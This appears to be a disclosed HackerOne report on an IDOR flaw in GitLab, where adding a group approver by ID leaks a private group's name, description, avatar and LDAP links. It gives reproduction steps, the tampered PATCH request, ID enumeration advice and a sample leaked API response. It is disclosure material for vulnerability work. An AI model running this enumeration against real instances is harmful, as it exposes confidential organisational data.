Project group approvers setting leaks private group names, avatars, LDAP settings, and description
Link: https://hackerone.com/reports/375116
By: @jobert
Details: There is an IDOR vulnerability that allows anyone to obtain the name, description, avatar, and LDAP configuration of a private group on a GitLab instance. This is currently exploitable on gitlab.com. To reproduce, follow the steps below.
Victim
- Sign in as a normal user
- Create a private group
- Grab the group's ID, which can be found in the HTML source on the group page
Attacker
- Sign in as a new user that can create projects
- Create a new group
- Create a new project and go to its Settings, expand Merge request settings
- Intercept your network traffic
- Add the group that was created in step 2 as a group approver
When the group is added as a reviewer, a request similar to the one below will be submitted:
Request
POST /:namespace/:project-name HTTP/1.1
Host: gitlab-instance
...
----------1442112407
Content-Disposition: form-data; name="_method"
PATCH
----------1442112407
Content-Disposition: form-data; name="project[approver_group_ids]"
1
----------1442112407--
The server will respond with a 302 Found response in case the approvers were saved. Now, repeat the request, but this time, replace the project[approver_group_ids]
with the group ID that was obtained in step 3 of the victim's steps. Since the group IDs are auto incremental, the attacker could enumerate them easily.
To obtain the information about the group, request the /api/v4/:namespace%2f:project-name/approvers
endpoint, which will respond with basic details about the group:
Response
{
"approvers": [
],
"approver_groups": [
{
"group": {
"id": 2,
"web_url": "https://gitlab-instance/:namespace",
"name": "hidden-group",
"path": "hidden-group",
"description": "This may contain confidential information.",
"visibility": "private",
"lfs_enabled": true,
"avatar_url": null,
"request_access_enabled": false,
"full_name": "hidden-group",
"full_path": "hidden-group",
"parent_id": null,
"ldap_cn": "a",
"ldap_access": 10,
"ldap_group_links": [
{
"cn": "a",
"group_access": 10,
"provider": "admin"
},
{
"cn": "1",
"group_access": 50,
"provider": "admin"
}
]
}
}
],
"approvals_before_merge": 0,
"reset_approvals_on_push": true,
"disable_overriding_approvers_per_merge_request": null
}
This vulnerability can also be exploited by sending a PUT
request to the GitLab API /api/v4/projects/:namespace%2f:hidden-name/approvers
endpoint (declared in ee/lib/api/project_approvals.rb
).
Impact
Information of private groups is supposed to remain confidential.